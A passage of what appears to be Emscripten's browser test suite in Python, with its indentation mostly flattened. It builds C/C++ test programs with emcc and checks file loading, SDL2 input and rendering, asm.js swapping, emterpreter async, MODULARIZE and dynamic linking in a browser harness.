Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)]).communicate()
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args).communicate()
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_hardware
def test_glfw3(self):
for opts in [[], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
def test_asm_swapping(self):
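    # Build two asm.js modules with SWAPPABLE_ASM_MODULE, turn the second into a swappable module
    # with tools/distill_asm.py, and use Module['onAsmSwap'] to verify that the swapped-in code
    # returns the new value (asm.js output is also validated when spidermonkey is configured).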
self.clear()
open('run.js', 'w').write(r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
if isinstance(SPIDERMONKEY_ENGINE, list) and len(SPIDERMONKEY_ENGINE[0]) != 0:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED','-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
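    # Simulate keydown/keypress/keyup DOM events from a pre-js and check that SDL2 observes the
    # expected sequence of key events.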
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, c);
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2','--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1', timeout=30)
def test_sdl2_mouse_offsets(self):
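    # Like test_sdl2_mouse, but events are dispatched with raw page coordinates at a canvas that a
    # custom page.html offsets via CSS, so the translation of mouse positions relative to the
    # canvas gets exercised (built with -DTEST_SDL_MOUSE_OFFSETS).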
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
@requires_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
@requires_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
@requires_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), os.path.join(self.get_dir(), 'cursor.bmp'))
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o']).communicate()
Popen([PYTHON, EMCC, 'test.o', '-s', 'USE_SDL=2', '-o', 'test.html']).communicate()
self.run_browser('test.html', '...', '/report_result?1')
@requires_hardware
def test_cocos2d_hello(self):
from tools import system_libs
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'Cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3'])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_bad_2(self):
for opts in [0, 1, 2, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'NO_EXIT_RUNTIME=0'])
@requires_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause a timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'BINARYEN_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression in the modularize feature introduced in commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# a non-default amount of memory that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
Popen([PYTHON, EMCC, 'test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
output = Popen([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue']).communicate()[0]
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I' + path_from_root('tests', 'webidl'), '-DBROWSER'] + opts)
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js'])
print('wasm in worker (we can read binary data synchronously there)')
open('pre.js', 'w').write('''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1']).communicate()
